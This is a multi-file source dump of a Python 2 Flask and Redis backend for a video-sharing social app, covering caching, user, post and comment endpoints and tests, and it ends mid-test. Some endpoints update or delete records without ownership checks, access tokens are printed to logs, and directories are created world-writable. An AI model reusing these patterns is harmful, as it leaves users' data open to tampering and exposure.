cacheutil.py\n\n\"\"\"\n一个进程内缓存的实现 应急的时候才用 并不是很安全\n\"\"\"\nimport types\nimport time\nimport hashlib\nimport json\n\nfrom motiky.configs import redis\n\nLOCALCACHE_POOL={} #本地缓存字典\nLOCALCACHE_MAX_ITEM_COUNT=10000 #最大存储对象数量\nLOCALCACHE_KILL_COUNT=1000 #缓存满时删除对象数量\n\n\ndef rcache(timeout, cachekey=None):\n \"\"\"基于redis 的函数调用缓存\"\"\"\n def inter1(func):\n def inter2(*args,**kwargs):\n if cachekey is not None:\n callstr = cachekey\n else:\n params = map(lambda xx:repr(xx),args)\n for (k,v) in kwargs.items():\n params.append('%s=%s'%(k,repr(v)))\n callstr='CALLCACHE::%s(%s)' % (func.func_name,','.join(params))\n retobj = redis.get(callstr)\n if retobj:\n return json.loads(retobj)\n retobj = func(*args,**kwargs)\n rp = redis.pipeline()\n rp.set(callstr,json.dumps(retobj)).expire(callstr,timeout).execute()\n return retobj\n return inter2\n return inter1\n\ndef delete_cache(cachekey=None):\n \"\"\"用相同的参数删除rcache\"\"\"\n def inter1(func):\n def inter2(*args,**kwargs):\n if cachekey is not None:\n callstr = cachekey\n else:\n params = map(lambda xx:repr(xx),args)\n for (k,v) in kwargs.items():\n params.append('%s=%s'%(k,repr(v)))\n callstr='CALLCACHE::%s(%s)' % (func.func_name,','.join(params))\n redis.delete(callstr)\n return inter2\n return inter1\n\ndef ugc_control_set(user_id,obj_type,obj_id,timeout):\n \"\"\"\n 设置UGC的时间\n 可以在执行ugc操作之前先过来set 一下,如果返回True则允许下一步\n False则因为太频繁不允许ugc\n \"\"\"\n assert type(user_id) == types.IntType\n assert type(timeout) == types.IntType\n q = {\n 'user_id':user_id,\n 'obj_type':obj_type,\n 'obj_id':obj_id\n }\n _key = \"\"\"UGC::%(user_id)s::%(obj_type)s::%(obj_id)s\"\"\" % q\n ret = redis.get(_key)\n if ret != None:\n return False\n else:\n redis.pipeline().set(_key,'on').expire(_key,timeout).execute()\n return True\n\ndef callcache(timeout):\n \"\"\"函数的调用缓存\"\"\"\n def inter1(func):\n def inter2(*args,**kwargs):\n params=map(lambda xx:repr(xx),args)\n for (k,v) in kwargs.items():\n params.append('%s=%s'%(k,repr(v)))\n callstr='%s(%s)'%(func.__name__,','.join(params))\n try:\n cachedict=LOCALCACHE_POOL[callstr]\n if cachedict['timeout']==None:\n return cachedict['return']\n elif cachedict['timeout']>time.time():\n return cachedict['return']\n else:\n del LOCALCACHE_POOL[callstr]\n except KeyError:\n pass\n retobj=func(*args,**kwargs)\n if len(LOCALCACHE_POOL)>=LOCALCACHE_MAX_ITEM_COUNT:\n clear_localcache()\n cachedict={'return':retobj,}\n if timeout:\n cachedict['timeout']=int(time.time())+timeout\n else:\n cachedict['timeout']=None\n LOCALCACHE_POOL[callstr]=cachedict\n return retobj\n return inter2\n return inter1\n\n\ndef clear_localcache():\n \"\"\"将本地缓存清理出一块空间来\"\"\"\n for (callstr,cachedict) in LOCALCACHE_POOL.items():\n if cachedict['timeout']<time.time():\n del LOCALCACHE_POOL[callstr] #删除已经超时的\n #need_del_left=len(LOCALCACHE_POOL)-LOCALCACHE_MAX_ITEM_COUNT\n need_del_left=len(LOCALCACHE_POOL)+LOCALCACHE_KILL_COUNT-LOCALCACHE_MAX_ITEM_COUNT\n for (callstr,cachedict) in LOCALCACHE_POOL.items():\n if cachedict['timeout']!=None:\n del LOCALCACHE_POOL[callstr]\n need_del_left-=1\n if need_del_left<=0:\n break\n return\n\n\n\n" }, { "alpha_fraction": 0.426086962223053, "alphanum_fraction": 0.508695662021637, "avg_line_length": 9.5, "blob_id": "e7c29677d77b83e9cb05a821c7a70c010a817e6b", "content_id": "a332e4e6457f8733ee4922dd2cdcded5a6a8fed8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 238, "license_type": "no_license", "max_line_length": 52, "num_lines": 22, "path": "/docs/motiky-api-doc.md", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "* 获取tags 列表\n\n```\nGET /tags\n\nRESPONSE \n\n{\n\t'results':[\n\t\t{\n\t\t\t'id':int,\n\t\t\t'name':str,\n\t\t\t'show':bool,\n\t\t\t'pic_url':str,\n\t\t\t'order_seq':int,\n\t\t\t'recommended':bool,\n\t\t\t'date_create':str => '1988-12-13 00:00:00.12345'\n\t\t},\n\t]\n}\n\n```" }, { "alpha_fraction": 0.7105262875556946, "alphanum_fraction": 0.7105262875556946, "avg_line_length": 37, "blob_id": "1d93d2ec375ef0b0826bba7cff9e81f1fdfe62ef", "content_id": "aa26c61695ca90798275f5b32929537b5269b782", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 114, "license_type": "no_license", "max_line_length": 70, "num_lines": 3, "path": "/scripts/pg_backup.sh", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "#!/bin/bash\nexport PGPASSWORD='password'\npg_dump -Uuser -hlocalhost -a -f /data/backups/`date +%F`.sql database\n" }, { "alpha_fraction": 0.7386091351509094, "alphanum_fraction": 0.743405282497406, "avg_line_length": 15.038461685180664, "blob_id": "9bb7c9d2f343e2267062eccac398fc7b3a9ca3b5", "content_id": "80a2c52f3550b04dfb5dee20e724f89bd9c47918", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 417, "license_type": "no_license", "max_line_length": 58, "num_lines": 26, "path": "/scripts/notify_data.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "#/usr/bin/evn python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport json\nimport traceback\n\nsys.path.insert(0,'../')\n\nfrom komandr import *\n\nfrom motiky.logic.models import User,Post,Comment,Activity\n\nfrom motiky import create_app\nfrom motiky import configs\nfrom motiky.configs import db\n\napp = create_app(configs.ProductionConfig)\n\n@command('generate_notify_data')\ndef generate_notify_data():\n pass\n\n\nmain()\n" }, { "alpha_fraction": 0.5618235468864441, "alphanum_fraction": 0.5673991441726685, "avg_line_length": 26.672727584838867, "blob_id": "9de450161e35c11ab57783687e44f3daad49d12b", "content_id": "da82b4839ae447d8a8147476786d88c3e2d27ed8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3049, "license_type": "no_license", "max_line_length": 75, "num_lines": 110, "path": "/motiky/views/comment.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# author: notedit <[email protected]>\n\nimport os\nimport sys\nimport md5\nimport time\nimport logging\nimport flask\nfrom flask import g\nfrom flask import request\nfrom flask import Blueprint\nfrom flask import redirect\nfrom flask import Response\nfrom flask import current_app\nfrom flask import session\nfrom flask import jsonify\nfrom flask import flash\nfrom flask.views import MethodView\nfrom flask.views import View\n\nfrom motiky import authutil\nfrom motiky import strutil\nfrom motiky.logic import backend\nfrom motiky.coreutil import BackendError\n\nfrom motiky.upyun import UpYun,md5,md5file\n\nfrom motiky.schema import NewCommentSchema\n\ninstance = Blueprint('comment',__name__)\n\n\nclass CommentView(MethodView):\n\n def post(self):\n data = NewCommentSchema().deserialize(request.json)\n \n user = backend.get_user(data['author_id'])\n\n post = backend.get_post(data['post_id'])\n\n if user['uid'] != g.ukey:\n return jsonify(error='not the user')\n \n try:\n comment = backend.add_comment(\n data['post_id'],\n data['content'].encode('utf-8'),\n data['author_id']\n )\n except BackendError,ex:\n raise\n\n if post['author_id'] != data['author_id']:\n try:\n backend.add_activity({\n 'post_id':data['post_id'],\n 'comment_id':comment['id'],\n 'from_id':data['author_id'],\n 'to_id':post['author_id'],\n 'atype':'comment'\n })\n except BackendError,ex:\n pass\n\n return jsonify(**comment)\n\n def delete(self,comment_id):\n comment = backend.get_comment(comment_id)\n try:\n backend.set_comment(comment_id,{'show':False})\n except BackendError,ex:\n abort(501)\n else:\n return '',204\n\n\nclass PostCommentsView(MethodView):\n\n def get(self,post_id):\n try:\n page = int(request.values.get('page','1'))\n except:\n page = 1\n\n limit = 20\n offset = (page-1)*limit\n\n comments = backend.get_post_comment(post_id,\n limit=limit,offset=offset)\n\n for comment in comments:\n user = backend.get_user(comment['author_id'])\n comment['user'] = user\n\n count = backend.get_post_comment_count(post_id)\n total_page = (count + limit -1 ) / limit\n return jsonify(comments=comments,page=page,total_page=total_page)\n\n\ninstance.add_url_rule('/comment',view_func=CommentView.as_view('comment'),\n methods=['POST'])\ninstance.add_url_rule('/comment/<int:comment_id>',\n view_func=CommentView.as_view('comment_delete'),\n methods=['DELETE'])\ninstance.add_url_rule('/post/<int:post_id>/comment',\n view_func=PostCommentsView.as_view('post_comment'),\n methods=['GET'])\n\n\n\n\n\n" }, { "alpha_fraction": 0.5399194359779358, "alphanum_fraction": 0.5446576476097107, "avg_line_length": 31.97265625, "blob_id": "3345765d362e9e335a09e855bbdae8abda4299a7", "content_id": "28b6e944f128f4d56bbf75d35d557c3728a08daf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8472, "license_type": "no_license", "max_line_length": 102, "num_lines": 256, "path": "/motiky/views/user.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# author: notedit <[email protected]>\n\nimport sys \nimport time\nimport logging\nfrom datetime import datetime\n\nimport requests\n\nimport flask\nfrom flask import g\nfrom flask import request\nfrom flask import Blueprint\nfrom flask import redirect\nfrom flask import Response\nfrom flask import current_app\nfrom flask import session\nfrom flask import jsonify\nfrom flask import flash\nfrom flask.views import MethodView\nfrom flask.views import View\n\nfrom motiky import authutil\nfrom motiky.logic import backend\nfrom motiky.coreutil import BackendError\n\nfrom motiky.schema import NewUserSchema,UpdateUserSchema,UserFollowSchema,\\\n InstallSchema,PushSchema\n\ninstance = Blueprint('user',__name__)\n\nclass UserView(MethodView):\n\n def get(self,user_id):\n user = backend.get_user(user_id)\n return jsonify(**user)\n\n def get_weibo_info(self,uid,access_token):\n if current_app.config.get('CONFIG_TYPE') == 'test':\n return {'username':'notedit',\n 'photo_url':'photo_url',\n 'signature':'signature'}\n\n resp = requests.get('https://api.weibo.com/2/users/show.json',\n params={\n 'uid':uid,\n 'access_token':access_token\n })\n _ = resp.json\n return {'username':_['screen_name'],\n 'photo_url':_['avatar_large'],\n 'signature':_['description']}\n\n\n def post(self):\n data = NewUserSchema().deserialize(request.json)\n print 'data',data\n try:\n user = backend.get_user_by_uid(data['uid'].encode('utf-8'))\n user = backend.set_user(user['id'],\n {\n 'uid':data['uid'].encode('utf-8'),\n 'access_token':data['access_token'].encode('utf-8')\n })\n except BackendError,ex:\n if ex.message == 'EmptyError':\n user = {}\n else:\n return jsonify(error='服务器开小差了')\n else:\n return jsonify(**user)\n\n _data = self.get_weibo_info(data['uid'],data['access_token'])\n data.update(_data)\n try:\n user = backend.add_user(\n data['username'].encode('utf-8'),\n data['photo_url'].encode('utf-8'),\n data['uid'].encode('utf-8'),\n data['signature'].encode('utf-8'),\n data['access_token'].encode('utf-8')\n )\n except BackendError,ex:\n return jsonify(error='add new user error')\n\n print 'add user',user\n user.update({'new':True})\n return jsonify(**user)\n\n def put(self,user_id):\n data = UpdateUserSchema().deserialize(request.json)\n try:\n user = backend.set_user(user_id,data)\n except BackendError,ex:\n raise ex\n else:\n return '',204\n\n\nclass InstallView(MethodView):\n\n def post(self):\n data = InstallSchema().deserialize(request.json)\n \n user_id = data['user_id']\n try:\n install = backend.get_install_by_user(user_id)\n except BackendError,ex:\n install = None\n\n if not install:\n install = backend.new_install(\n data['user_id'],\n data['device_token'].encode('utf-8'),\n data['version'],\n data['device_type'])\n\n return jsonify(install_id=install['id'])\n\n\nclass UserFollowView(MethodView):\n\n def post(self):\n '''关注用户'''\n data = UserFollowSchema().deserialize(request.json)\n from_id = authutil.get_user_id(g.ukey)\n for uid in data['user_ids']:\n try:\n backend.follow_user(from_id,uid)\n backend.add_activity({\n 'from_id':from_id,\n 'to_id':uid,\n 'atype':'follow'\n })\n except BackendError,ex:\n pass\n\n return '',201\n\n\n def delete(self,user_id_to):\n '''取消关注'''\n user_id = authutil.get_user_id(g.ukey)\n try:\n backend.unfollow_user(user_id,user_id_to)\n except BackendError,ex:\n raise \n return '',204\n\n\nclass UserIsFollowingView(MethodView):\n\n def get(self,user_id_to):\n user_id = authutil.get_user_id(g.ukey)\n ret = backend.is_following_user(user_id,user_id_to)\n return jsonify(is_follow=ret)\n\n\nclass UserFollowingView(MethodView):\n\n def get(self,user_id):\n try:\n page = int(request.values.get('page'))\n except:\n page = 1\n\n limit = 50\n offset = (page-1) * 50\n\n following_users = backend.get_user_following(user_id,limit=limit,\n offset=offset)\n\n curr_user = backend.get_user_by_uid(g.ukey)\n\n fids = [u['id'] for u in following_users]\n fdict = backend.is_following_user(curr_user['id'],fids)\n for fu in following_users:\n fu['follower_count'] = backend.get_user_follower_count(fu['id'])\n fu['is_follow'] = fdict.get(fu['id']) or False\n count = backend.get_user_following_count(user_id)\n total_page = (count + 49) / 50\n return jsonify(users=following_users,page=page,total_page=total_page)\n\n\nclass UserFollowerView(MethodView):\n\n def get(self,user_id):\n try:\n page = int(request.values.get('page'))\n except:\n page = 1\n\n limit = 50\n offset = (page - 1) * 50\n followers = backend.get_user_follower(user_id,limit=limit,offset=offset)\n fids = [u['id'] for u in followers]\n\n curr_user = backend.get_user_by_uid(g.ukey)\n\n fdict = backend.is_following_user(curr_user['id'],fids)\n for fu in followers:\n fu['follower_count'] = backend.get_user_follower_count(fu['id'])\n fu['is_follow'] = fdict.get(fu['id']) or False\n count = backend.get_user_follower_count(user_id)\n total_page = (count + 49) / 50\n return jsonify(users=followers,page=page,total_page=total_page)\n\nclass ProfileView(MethodView):\n\n def get(self,user_id):\n user = backend.get_user(user_id)\n\n user_following_count = backend.get_user_following_count(user_id)\n user_follower_count = backend.get_user_follower_count(user_id)\n user_post_count = backend.get_user_post_count(user_id)\n user_liked_post_count = backend.get_user_liked_post_count(user_id)\n\n curr_user = backend.get_user_by_uid(g.ukey)\n\n is_follow = backend.is_following_user(curr_user['id'],user_id)\n \n pd = {\n 'is_follow':is_follow,\n 'following_count':user_following_count,\n 'follower_count':user_follower_count,\n 'post_count':user_post_count,\n 'liked_post_count':user_liked_post_count\n }\n user.update(pd)\n return jsonify(**user)\n\n\ninstance.add_url_rule('/user',view_func=UserView.as_view('user'),\n methods=['POST',])\ninstance.add_url_rule('/user/<int:user_id>',view_func=UserView.as_view('user'),\n methods=['GET','PUT'])\ninstance.add_url_rule('/install',view_func=InstallView.as_view('install'),\n methods=['POST'])\ninstance.add_url_rule('/user/follow',view_func=UserFollowView.as_view('user_follow'),\n methods=['POST'])\ninstance.add_url_rule('/user/follow/<int:user_id_to>',view_func=UserFollowView.as_view('user_follow'),\n methods=['DELETE'])\ninstance.add_url_rule('/user/isfollowing/<int:user_id>',\n view_func=UserIsFollowingView.as_view('user_is_following'),\n methods=['GET'])\ninstance.add_url_rule('/user/following/<int:user_id>',\n view_func=UserFollowingView.as_view('user_following'),\n methods=['GET'])\ninstance.add_url_rule('/user/follower/<int:user_id>',\n view_func=UserFollowerView.as_view('user_follower'),\n methods=['GET'])\ninstance.add_url_rule('/user/profile/<int:user_id>',\n view_func=ProfileView.as_view('user_profile'),\n methods=['GET'])\n\n" }, { "alpha_fraction": 0.6138364672660828, "alphanum_fraction": 0.6150943636894226, "avg_line_length": 22.382352828979492, "blob_id": "40248a5a1a38541c04206d887a7382ed921a27dc", "content_id": "8d463e6ad9ee29fee4ac69c84f0a45d3117a42dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 795, "license_type": "no_license", "max_line_length": 89, "num_lines": 34, "path": "/tests/__init__.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport unittest\nimport logging\nimport time\nimport hmac\n\nfrom flask.ext.testing import TestCase as Base\n\nfrom motiky import create_app\nfrom motiky import configs\nfrom motiky.configs import db,redis\n\nclass TestCase(Base):\n\n def create_app(self):\n app = create_app(configs.TestConfig)\n app.config['TESTING'] = True\n return app\n\n def generate_header(self,ukey):\n _now = int(time.time())\n token = '%s|%d|%s' % (ukey,_now,hmac.new(configs.TestConfig().APPLICATION_SECRET,\n ukey+str(_now)).hexdigest())\n return {'X-MOTIKY-TOKEN':token}\n\n def setUp(self):\n db.create_all()\n redis.flushdb()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n print dir(redis)\n" }, { "alpha_fraction": 0.7609890103340149, "alphanum_fraction": 0.7637362480163574, "avg_line_length": 19.705883026123047, "blob_id": "f4971b8321bbdaeb1dcba73a6718fbe5b7f40178", "content_id": "67cae1ea73ce666d810d09762ec093baaf48d59b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 364, "license_type": "no_license", "max_line_length": 34, "num_lines": 17, "path": "/motiky/views/index.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# author: notedit <[email protected]>\n\nimport sys \nimport time\nimport logging\nimport flask\nfrom flask import g\nfrom flask import request\nfrom flask import redirect\nfrom flask import Response\nfrom flask import current_app\nfrom flask import session\nfrom flask import jsonify\nfrom flask.views import MethodView\nfrom flask.views import View\n\n\n\n \n\n\n\n\n" }, { "alpha_fraction": 0.5646132826805115, "alphanum_fraction": 0.569900393486023, "avg_line_length": 30.13793182373047, "blob_id": "d0f33ab99ac44f434b34924ecff30bbeef689a7a", "content_id": "78c4226e2984a0c349df6a7d000286e628a04477", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8133, "license_type": "no_license", "max_line_length": 84, "num_lines": 261, "path": "/motiky/views/post.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# author: notedit <[email protected]>\n\nimport os\nimport sys\nimport md5\nimport time\nimport logging\nimport flask\nfrom flask import g\nfrom flask import request\nfrom flask import Blueprint\nfrom flask import redirect\nfrom flask import Response\nfrom flask import current_app\nfrom flask import session\nfrom flask import jsonify\nfrom flask import flash\nfrom flask.views import MethodView\nfrom flask.views import View\n\nfrom motiky import authutil\nfrom motiky import strutil\nfrom motiky.logic import backend\nfrom motiky.coreutil import BackendError\n\nfrom motiky.upyun import UpYun,md5,md5file\n\nfrom motiky.schema import NewPostSchema,UpdatePostSchema,\\\n PostLikeSchema,PostUnlikeSchema\n\ninstance = Blueprint('post',__name__)\n\nupYun = UpYun('xxxxxxxx','xxxxxxxxxx','xxxxxxxxx')\nupYun.setApiDomain('v0.api.upyun.com')\nupYun.debug = True\n\ndef save_file(file_data,ftype):\n file_md5 = md5(file_data)\n file_size = len(file_data)\n file_id = backend.add_file_data(file_size,file_md5)\n extname = 'mp4' if ftype == 'video' else 'jpg'\n file_url = '%s.%s' % (file_id,extname)\n if current_app.config.get('CONFIG_TYPE') == 'production':\n upYun.writeFile('/'+file_url,file_data)\n else:\n writeFile('/storage/' + file_url,file_data)\n return file_id,file_url\n\n\ndef writeFile(file_url,file_data):\n dirname = os.path.dirname(file_url)\n if not os.path.exists(dirname):\n os.makedirs(dirname,0777)\n\n with open(file_url,'wb') as f:\n f.write(file_data)\n f.flush()\n\nclass PostView(MethodView):\n\n def get(self,post_id):\n post = backend.get_post(post_id)\n curr_user = backend.get_user_by_uid(g.ukey)\n post['is_like'] = backend.is_like_post(curr_user['id'],post['id'])\n post['like_count'] = backend.get_post_liked_count(post_id)\n post['comment_count'] = backend.get_post_comment_count(post_id)\n return jsonify(**post)\n\n def post(self):\n _data = {\n 'author_id':request.values.get('author_id'),\n 'title':request.values.get('title'),\n }\n data = NewPostSchema().deserialize(_data)\n \n user = backend.get_user(data['author_id'])\n \n if user['uid'] != g.ukey:\n return jsonify(error='not the user')\n\n # video_file\n video_file = request.files.get('video_file')\n video_data = strutil.read_data(video_file)\n video_id,video_url = save_file(video_data,'video')\n\n # pic_file\n pic_file = request.files.get('pic_file')\n pic_data = strutil.read_data(pic_file)\n pic_id,pic_url = save_file(pic_data,'pic')\n\n data['title'] = data['title'].encode('utf-8') if data['title'] else ''\n try:\n post = backend.add_post(\n data['title'],\n data['author_id'],\n video_url,\n pic_small=pic_url\n )\n except BackendError,ex:\n raise\n\n tags = strutil.extract_tags(data['title'])\n\n if tags:\n backend.add_post_tag(post['id'],tags)\n\n return jsonify(**post)\n\n def put(self,post_id):\n data = UpdatePostSchema().deserialize(request.json)\n try:\n backend.set_post(post_id,data)\n except BackendError,ex:\n abort(501)\n else:\n return '',204\n\n def delete(self,post_id):\n post = backend.get_post(post_id)\n curr_id = authutil.get_user_id(g.ukey)\n if post['author_id'] != curr_id:\n return jsonify(error='forbid')\n try:\n backend.set_post(post_id,{'show':'deleted_by_user'})\n except BackendError,ex:\n abort(501)\n else:\n return '',204\n\n\nclass PostListView(MethodView):\n\n def get(self):\n try:\n page = int(request.values.get('page','1'))\n except:\n page = 1\n\n limit = 20\n offset = (page-1)*limit\n\n posts = backend.get_latest_post(limit=limit,offset=offset)\n count = backend.get_post_count()\n\n for post in posts:\n post['like_count'] = backend.get_post_liked_count(post['id'])\n post['comment_count'] = backend.get_post_comment_count(post['id'])\n \n total_page = (count + limit -1 ) / limit\n return jsonify(posts=posts,page=page,total_page=total_page)\n\n\nclass UserPostView(MethodView):\n\n def get(self,user_id):\n try:\n page = int(request.values.get('page','1'))\n except:\n page = 1\n\n limit = 20\n offset = (page-1) * limit\n \n curr_user = backend.get_user_by_uid(g.ukey)\n user_posts = backend.get_user_post(user_id,limit=limit,offset=offset)\n\n liked_post_ids = [p['id'] for p in user_posts];\n liked_dict = backend.is_like_post(curr_user['id'],liked_post_ids)\n for up in user_posts:\n up['is_like'] = liked_dict.get(up['id']) or False\n up['like_count'] = backend.get_post_liked_count(up['id'])\n up['comment_count'] = backend.get_post_comment_count(up['id'])\n \n\n\n count = backend.get_user_post_count(user_id)\n total_page = (count + limit - 1) / limit\n\n return jsonify(posts=user_posts,page=page,total_page=total_page)\n\nclass UserLikedPostView(MethodView):\n\n def get(self,user_id):\n try:\n page = int(request.values.get('page'))\n except:\n page = 1\n\n limit = 20\n offset = (page-1) * limit\n\n liked_posts = backend.get_user_liked_post(user_id,limit=limit,offset=offset)\n for p in liked_posts:\n p['is_like'] = True\n p['like_count'] = backend.get_post_liked_count(p['id'])\n p['comment_count'] = backend.get_post_comment_count(p['id'])\n \n\n count = backend.get_user_liked_post_count(user_id)\n total_page = (count + limit -1) / limit\n \n return jsonify(posts=liked_posts,page=page,total_page=total_page)\n\nclass PostLikeView(MethodView):\n\n def post(self):\n data = PostLikeSchema().deserialize(request.json)\n try:\n ret = backend.add_like(data['user_id'],data['post_id'])\n except BackendError,ex:\n return jsonify(error='can not add like')\n\n try:\n post = backend.get_post(data['post_id'])\n backend.add_activity({\n 'post_id':data['post_id'],\n 'from_id':data['user_id'],\n 'to_id':post['author_id'],\n 'atype':'like'\n })\n except BackendError,ex:\n pass\n\n liked_count = backend.get_post_liked_count(data['post_id'])\n\n return jsonify(like_count=liked_count)\n\nclass PostUnlikeView(MethodView):\n\n def post(self):\n data = PostUnlikeSchema().deserialize(request.json)\n try:\n ret = backend.del_like(data['user_id'],data['post_id'])\n except BackendError,ex:\n raise \n\n liked_count = backend.get_post_liked_count(data['post_id'])\n\n return jsonify(like_count=liked_count)\n\n\ninstance.add_url_rule('/post',view_func=PostView.as_view('post'),\n methods=['POST'])\ninstance.add_url_rule('/post/<int:post_id>',view_func=PostView.as_view('post'),\n methods=['GET','PUT','DELETE'])\ninstance.add_url_rule('/posts',view_func=PostListView.as_view('posts'),\n methods=['GET'])\ninstance.add_url_rule('/posts/user/<int:user_id>',\n view_func=UserPostView.as_view('user_post'),\n methods=['GET',])\ninstance.add_url_rule('/posts/user/<int:user_id>/liked',\n view_func=UserLikedPostView.as_view('user_liked_post'),\n methods=['GET',])\ninstance.add_url_rule('/post/like',\n view_func=PostLikeView.as_view('post_like'),\n methods=['POST',])\ninstance.add_url_rule('/post/unlike',\n view_func=PostUnlikeView.as_view('post_unlike'),\n methods=['POST',])\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.595625638961792, "alphanum_fraction": 0.5986775159835815, "avg_line_length": 27.83823585510254, "blob_id": "826a513505d77b0484a44d5d7de75f9cf5d9201f", "content_id": "c7b19287af36639dea79e125a75f79414dc27d24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1994, "license_type": "no_license", "max_line_length": 81, "num_lines": 68, "path": "/motiky/coreutil.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*- \n\nimport os\nimport sys\nimport time\nimport logging\nimport inspect\nimport traceback\n\n\n\nbackend_mapping = {}\ndef register(funcname=None):\n global backend_mapping \n def inter1(func,funcname=None):\n funcname = funcname if funcname else func.__name__\n if not backend_mapping.has_key(funcname):\n backend_mapping[funcname] =func\n else:\n raise KeyError('%s:funcname declare more than once '%repr(funcname))\n def inter2(*args,**kwargs):\n return func(*args,**kwargs)\n setattr(inter2,'argspec',inspect.getargspec(func))\n return inter2\n return lambda func:inter1(func,funcname)\n\ndef assert_error(expr,msg,detail=''):\n if not expr:\n if not detail:\n detail = msg\n raise BackendError(msg,detail)\n\nclass BackendError(Exception):\n def __init__(self,message,detail):\n self.message = message\n self.detail = detail\n \n def __str__(self):\n return 'BackendError(%s,%s)' % (self.message,self.detail)\n\n def __repr__(self):\n return 'BackendError(%s,%s)' %(self.message,self.detail)\n\n\nclass Backend(object):\n '''去掉一些后端不需要导出的方法'''\n def __init__(self,func_mapping):\n self.func_mapping = func_mapping\n\n def __getattr__(self,attr_name):\n if self.func_mapping.has_key(attr_name):\n func = lambda *args,**kwargs: self.__call__(attr_name,*args,**kwargs)\n func.__name__ = 'backend.' + attr_name\n return func\n else:\n raise AttributeError('backend does not have %s attibute'%attr_name)\n\n\n def __call__(self,funcname,*args,**kwargs):\n try:\n return self.func_mapping[funcname](*args,**kwargs)\n except BackendError,ex:\n print ex.detail\n raise ex \n except Exception,ex:\n excstr = traceback.format_exc()\n print excstr\n raise BackendError('BackendError',excstr)\n\n\n\n\n\n" }, { "alpha_fraction": 0.5238507986068726, "alphanum_fraction": 0.5542064309120178, "avg_line_length": 33.1629638671875, "blob_id": "2bf898788870f8eeafde5b3c5a4b30203644e076", "content_id": "c2c12e00e13d1b9e72406cc9596adaf9f06689e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4612, "license_type": "no_license", "max_line_length": 82, "num_lines": 135, "path": "/tests/test_post.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\nimport os\nimport sys\nimport types\nimport json\nimport time\nfrom datetime import datetime\nfrom datetime import timedelta\n\nfrom StringIO import StringIO\n\nfrom tests import TestCase\n\n\nfrom motiky.logic.models import User,Post,UserLikeAsso,Report,Install,\\\n UserFollowAsso,Comment,Activity,Action\n\nfrom motiky.logic import backend\n\nfrom motiky.configs import db,redis\n\nclass TestPost(TestCase):\n\n\n def test_post_view(self):\n\n # post\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n headers = self.generate_header('weibo_id01')\n data = {\n 'title':'title01',\n 'author_id':user1['id'],\n 'video_file':(StringIO('AAAA' * 10000),'hello.mp4'),\n 'pic_file':(StringIO('AAAA' * 1000),'hello.png')\n }\n\n resp = self.client.post('/post',data=data,headers=headers)\n\n _data = json.loads(resp.data)\n assert resp.status_code == 200\n assert _data['title'] == 'title01'\n\n # get\n resp = self.client.get('/post/%d' % _data['id'],headers=headers)\n data_get = json.loads(resp.data)\n print resp.data\n assert data_get['title'] == 'title01'\n\n # put\n put_in = {'pic_small':'pic_small'}\n resp = self.client.put('/post/%d'%_data['id'],data=json.dumps(put_in),\n headers=headers,content_type='application/json')\n print resp.data\n assert resp.status_code == 204\n\n def test_posts_view(self):\n\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n post1 = backend.add_post('post01',user1['id'],\n 'video_url','pic_small1')\n post2 = backend.add_post('post02',user1['id'],\n 'video_url','pic_small2')\n post3 = backend.add_post('post03',user1['id'],\n 'video_url','pic_small3')\n\n headers = self.generate_header('weibo_id01')\n\n resp = self.client.get('/posts',headers=headers)\n data_get = json.loads(resp.data)\n assert len(data_get['posts']) == 3\n\n def test_user_posts(self):\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n post1 = backend.add_post('post01',user1['id'],\n 'video_url','pic_small1')\n post2 = backend.add_post('post02',user1['id'],\n 'video_url','pic_small2')\n post3 = backend.add_post('post03',user1['id'],\n 'video_url','pic_small3')\n\n headers = self.generate_header('weibo_id01')\n\n resp = self.client.get('/posts/user/%d'%user1['id'],headers=headers)\n data_get = json.loads(resp.data)\n assert len(data_get['posts']) == 3\n\n def test_user_liked_posts(self):\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n post1 = backend.add_post('post01',user1['id'],\n 'video_url','pic_small1')\n post2 = backend.add_post('post02',user1['id'],\n 'video_url','pic_small2')\n post3 = backend.add_post('post03',user1['id'],\n 'video_url','pic_small3')\n\n headers = self.generate_header('weibo_id01')\n\n ula1 = UserLikeAsso(user_id=user1['id'],post_id=post1['id'])\n ula2 = UserLikeAsso(user_id=user1['id'],post_id=post2['id'])\n ula3 = UserLikeAsso(user_id=user1['id'],post_id=post3['id'])\n\n db.session.add(ula1)\n db.session.add(ula2)\n db.session.add(ula3)\n db.session.commit()\n\n resp = self.client.get('/posts/user/%d/liked'%user1['id'],headers=headers)\n data_get = json.loads(resp.data)\n assert len(data_get['posts']) == 3\n\n def test_post_like(self):\n user1 = 